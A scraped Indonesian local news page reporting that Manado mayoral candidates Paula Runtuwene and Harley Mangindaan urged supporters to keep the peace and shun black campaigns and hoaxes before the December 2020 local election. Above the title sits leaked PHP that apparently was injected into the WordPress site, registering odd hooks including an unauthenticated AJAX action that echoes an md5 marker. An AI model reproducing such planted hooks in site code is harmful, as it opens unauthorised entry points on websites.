function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); PAHAM: Mari Jaga Kerukunan, Jangan Terpecah Karena Pilkada – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 31 Okt 2020 21:06 WIB ·

PAHAM: Mari Jaga Kerukunan, Jangan Terpecah Karena Pilkada


					PAHAM: Mari Jaga Kerukunan, Jangan Terpecah Karena Pilkada Perbesar

 

MANADO – Pasangan calon Wali Kota dan Wakil Wali Kota Manado Julyeta Paulina Amelia Runtuwene – Harley Alfredo Benfica Mangindaan (PAHAM) mengingatkan kepada para pendukungnya untuk selalu menjaga kerukunan jelang pesta demokrasi pada tanggal 9 Desember nanti.

“Jangan mudah terpancing dan jangan menyerang paslon atau pendukung paslon. Kita buktikan orang-orang PAHAM paling cerdas dan cinta damai. Kalau ada yang menyerang kami sebagai Paslon, dihiraukan saja dan jangan ambil pusing. Mari kita wujudkan Pilkada damai,” kata Calon Wali Kota Prof Paula Runtuwene (JPAR)

Selain itu, Prof Paula juga menghimbau agar para pendukung tidak melakukan kampanye hitam terhadap calon lain.

“Kalau pendukung PAHAM tidak menyerang calon lain, pasti kami sebagai Paslon yang dipuji. Mari kita jaga kerukunan antar warga supaya Pilkada bisa berjalan dengan aman dan nyaman,” ujar JPAR.

Sementara itu, Harley Mangindaan juga meminta kepada para pendukung untuk selalu menjaga suasana kondusif di media sosial.

“Banyak isu-isu hoax yang sering berkembang lewat medsos. Saya harap para pendukung PAHAM tidak mudah termakan oleh kabar-kabar hoax. Marilah kita menggunakan Medsos untuk hal-hal yang positif dan berkualitas,” ujarnya. (AMan)

Artikel ini telah dibaca 3 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized